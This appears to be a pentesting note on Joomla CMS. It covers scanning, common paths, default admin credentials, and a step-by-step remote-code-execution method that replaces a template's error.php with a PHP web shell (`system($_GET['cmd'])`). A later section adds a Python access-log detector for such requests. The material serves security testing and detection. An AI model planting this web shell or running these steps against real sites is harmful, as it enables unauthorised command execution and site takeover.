# Joomla CMS Pentesting

Joomla is a content management system (CMS).

### Scan <a href="#scan" id="scan"></a>

```
joomscan -u https://example.com
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/administrator/
/administrator/manifests/files/joomla.xml
/cache/
/components/
/configuration.php
/htaccess.txt
/includes/
/index.php
/joomla.xml
/language/en-GB/en-GB.xml
/libraries/
/LICENSE.txt
/logs/
/media/
/modules/
/plugins/
/README.txt
/templates/
/tmp/
/web.config.txt
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

The default username is **"admin"**, with no password.

### RCE <a href="#rce" id="rce"></a>

Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce)

If we have admin credentials, we may be able to execute arbitrary code by manipulating the site template.

#### 1. Login as Admin <a href="#id-1-login-as-admin" id="id-1-login-as-admin"></a>

First, go to the `/administrator` page and log in with the admin credentials.

#### 2. Select Template <a href="#id-2-select-template" id="id-2-select-template"></a>

In the dashboard, go to the template selection menu and click a template name. The list of the template's pages appears in the left menu.\
Here we edit `error.php`, so click it in the left menu.

#### 3. Inject Arbitrary Code <a href="#id-3-inject-arbitrary-code" id="id-3-inject-arbitrary-code"></a>

In the editor for `error.php`, delete the original PHP code and insert arbitrary PHP code such as:

```
<?php system($_GET['cmd']); ?>
```

If we want a shell on the target, we can insert reverse shell code instead. See the [Web Reverse Shell](https://exploit-notes.hdks.org/exploit/shell/web-reverse-shell/) page for details.\
After that, click **Save & Close**.

#### 4. Execute <a href="#id-4-execute" id="id-4-execute"></a>

Now access the template's `error.php` page as below:

```
https://example.com/templates/<template_name>/error.php
# or
https://example.com/templates/<template_name>/error.php?cmd=whoami
```
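On the defensive side, step 4 leaves a trace in the web server's access log, because template PHP files are normally included through `/index.php` rather than requested directly. The following is an added example, not part of the original page: a detector for such requests, assuming Apache/Nginx combined log format; the template name `example_tpl` and the sample log lines are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format prefix: ip - user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# A PHP file requested directly from a site or administrator template directory.
TEMPLATE_PHP_RE = re.compile(
    r'^/(?:administrator/)?templates/(?P<template>[^/]+)/(?P<file>.+\.php)$', re.I)

def find_direct_template_requests(lines):
    """Flag direct HTTP requests for PHP files under /templates/.

    Assumption: stock template files start with Joomla's `defined('_JEXEC') or die;`
    guard, so a direct request returns an empty body. A 200 response with a
    non-empty body means the file ran on its own, i.e. the guard is gone.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        path = posixpath.normpath(unquote(url.path))  # resolve ./, ../ and %-encoding
        t = TEMPLATE_PHP_RE.match(path)
        if not t:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        executed = m["status"] == "200" and size > 0
        findings.append({
            "ip": m["ip"], "template": t["template"], "file": t["file"],
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            "severity": "high" if executed else "low",
        })
    return findings

# Constructed sample lines (documentation IP ranges, made-up template name).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:01:03 +0000] "GET /templates/example_tpl/css/template.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:05:00 +0000] "GET /templates/example_tpl/error.php HTTP/1.1" 200 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:10:07:41 +0000] "GET /templates/example_tpl/error.php?cmd=whoami HTTP/1.1" 200 9 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in find_direct_template_requests(SAMPLE_LOG):
        print(finding)
```

A `high` finding is a reason to diff the named template file against a clean copy of the same template version.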

### References <a href="#references" id="references"></a>

* [CMSJunkie](https://www.cmsjunkie.com/blog/post/understanding-the-joomla-directory-structure)
